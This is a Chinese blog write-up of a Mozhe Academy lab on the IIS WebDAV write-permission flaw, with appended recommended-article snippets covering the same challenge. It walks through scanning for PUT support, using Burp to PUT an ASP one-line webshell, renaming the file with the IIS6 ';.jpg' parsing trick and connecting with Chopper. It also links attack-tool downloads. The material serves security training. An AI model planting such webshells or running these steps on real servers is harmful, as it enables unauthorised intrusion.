墨者学院 - IIS写权限漏洞分析溯源

最新推荐文章于 2022-10-06 18:56:25 发布
最新推荐文章于 2022-10-06 18:56:25 发布
阅读量1.5k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: iis Mozhe web webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42357070/article/details/82183988
本文探讨了由于服务器配置不当导致的IIS写权限漏洞,该漏洞由开启的WebDAV组件引起。通过IIS PUT Scanner进行扫描,发现漏洞。然而,不同工具的利用效果不同,Burp Suite用于抓包和修改请求,尝试利用漏洞,但遇到401错误。尽管如此,仍有可能利用此漏洞进行进一步的攻击,如通过菜刀连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了

webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

 

 

iis scan工具链接

链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54

桂林老兵工具链接:

链接:https://pan.baidu.com/s/1DosFFiPpVQhag7W2BrNDLQ 密码:zfh3

 

使用iis scan工具链接可以得到 该站点可以put

但是使用桂林老兵无法put数据

一首凉凉。。

 

尝试用burp抓包修改写入 

 

repeater

修改GET为OPTIONS

查看可执行命令

 

增加或修改以下
PUT /2.txt HTTP/1.1
Host: 219.153.49.228:端口




<%eval request("tdl")%>
返回不是bad request或者404就行

更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg,burp写入

关于iis6.0解析漏洞可看此文:

最低0.47元/天 解锁文章

200万优质内容无限畅学
墨者_IIS权限漏洞分析溯源
weixin_50698958的博客
10-13 448
靶场: https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe 背景介绍 某日,安全工程师"墨者"对一内网进行授权扫描,在扫描过程中,发现了一台Windows2003的服务器,开启了web服务,业主单位员工坚称是一个调试服务器,只安装了IIS6.0,无任何代码程序,不可能会有安全问题。"墨者"一听就来劲了,拿起工具,手起刀落~~~~~~ 实训目标 1、了解IIS WebDAV安全配置; 2、了解HTT
CTF-IIS权限漏洞分析溯源
asd158923328的博客
08-21 761
根据题意 原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 用burp抓包修改入,修改GETOPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT入一句话木马到一个文件里面 更改或增加以下 PUT ...
墨者学院-IIS权限漏洞分析溯源
臭nana的博客
12-18 627
利用burpsuit抓包 发送到repeater 将GET改成OPTIONS 发现Allow部分有PUT和MOVE 然后利用PUT入一句话木马到一个文件里面 利用iis6文件解析漏洞,用MOVE改文件后缀名为.asp;.jpg 菜刀连接 拿到key ...
【WEB】IIS权限漏洞分析溯源
HAPPY
08-19 1299
【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe 【解法】 1.首先iis scaner发现有put漏洞,但是无法用工具注入。 2.尝试用burp抓包修改入  PUT /test.txt HTTP/1.1 Host: 219.153.49.228:43672 Pragma: ...
IIS权限漏洞
05-03
IIS权限漏洞,discua建须搭知与漏洞不全
墨者学院-投票常见漏洞分析溯源
Ruoten的博客
01-01 3573
1.进入靶场,任务要求是需要我们投票,把a2019的票数成为第一,就是所谓的刷票,完成后,就会获得key值 2.然后打开BurpSuite打开响应包拦截,当我们点击投票按钮,BurpSuite就会拦截到一个响应包 3.点击鼠标右键点击"send to Intruder",然后把响应包的内容进行修改修改User-Agent的头数据为"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom.
墨者学院-热点评论刷分漏洞分析溯源
JimWu的博客
09-05 1521
热点评论刷分漏洞分析溯源 难易程度:★ 题目类型:网络安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,进入评论点赞,发现每个人只能点赞一次。 但题目要求点赞数过500,才能获取key。 2.点赞有ip限制,所以要通过Burpsuite暴力破解,实现多ip点赞。 3.打开burpsuite,点赞时截包,右键send to intruder 4.在下方加入X-Forwarde...
墨者学院-WEB安全-身份认证和会话管理-登录密码重置漏洞分析溯源
AccompanyTiMi的博客
10-27 431
墨者学院-WEB安全-身份认证和会话管理-登录密码重置漏洞分析溯源 通过已知信息访问目标网站。 已知注册了一个手机号,因此我们可以通过抓包把17101304128手机号改为18868345809,看看我们已有的手机号是否能够接收验证码从而用在该次验证上。 修改后放包,发现已成功获取验证码。 通过练习,了解到该服务器未验证短信验证码与手机的匹配关系,导致任意手机号的密码都可以互相验证并篡改密码。没有把验证码与账号关联起来。 最开始做的时候还老老实实的做,对响应包验证码进行解码解不出来。 ...
Iis权限漏洞认识
weixin_34313182的博客
10-13 250
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis漏洞。网站主目录设置可权限,可直接往服务器上文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限,利用时只能上传txt文件,使用move方法将txt文件改正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
利用IIS权限漏洞
qq_35266419的博客
10-11 815
题目 目标服务器开启了IIS服务,搭建了一个网站。已知该网站的管理人员比较粗心且经验不足,没有就IIS权限进行必要的防范。请利用该权限漏洞,对目标网站进行渗透并找到key.txt文件,将文件内容作为FLAG值进行提交。 题目分析 1.IIS (互联网信息服务) ①IIS是Internet Information Services的缩,意为互联网信息服务,是由微软公司提供的基于运行Micros...
IIS权限漏洞工具
10-19
IIS权限漏洞工具 IIS权限漏洞工具
iis权限
08-07
iis权限
科普文之iis权限漏洞
ccx_john的专栏
07-11 2627
今天特意跑到学校听了一堂课,然后学了很多东西,就一个笔记,分享一下吧。都是本地环境,没有真实环境,我小白,别喷我。 Iis权限漏洞 说明:这个漏洞的产生原因来源于服务器配置不当 演示: 利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持P
墨者学院 - 内部文件上传系统漏洞分析溯源
多崎巡礼的博客
07-26 2180
有意思有意思,搜索了半天还是不懂怎么创建文件夹,老老实实看了解题思路柳暗花明 burp还有这种操作,学到了不亏不亏 上传默认是upload 利用burp截包,更改(没有则自动创建)上传文件夹 此处更改为test.asp (iis6.0漏洞: 例如文件的名字为“*.asp;xxx.jpg”,会被 IIS 当作 asp 文件来解析并执行,原因是这样的: 首先我们请求 /aaa.asp;xxx.jpg...
编辑器漏洞分析溯源(第1题)
weixin_47493074的博客
10-06 354
编辑器漏洞分析溯源(第1题)
墨者靶场 初级:编辑器漏洞分析溯源(第1题)
qq_43233085的博客
01-19 764
墨者靶场 初级:编辑器漏洞分析溯源(第1题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 根据提示,使用fck漏洞利用工具,找到文件上传页面。 ...
墨者学院-编辑器漏洞分析溯源(第2题)
JimWu的博客
09-05 452
编辑器漏洞分析溯源(第2题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:IE、菜刀、win2003 1.打开靶场 首先要了解ewebeditor的基本特征: 默认登陆admin_login.asp 默认数据库db/ewebeditor.mdb 2.在url中输入数据库,下载文件,就能得到登录的用户名和密码。 但是用户名经过了md5加密,需要通过网上来解密,得到用户名和密码。 3.登录...
墨者学院WebShell文件上传漏洞分析溯源(第1题)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值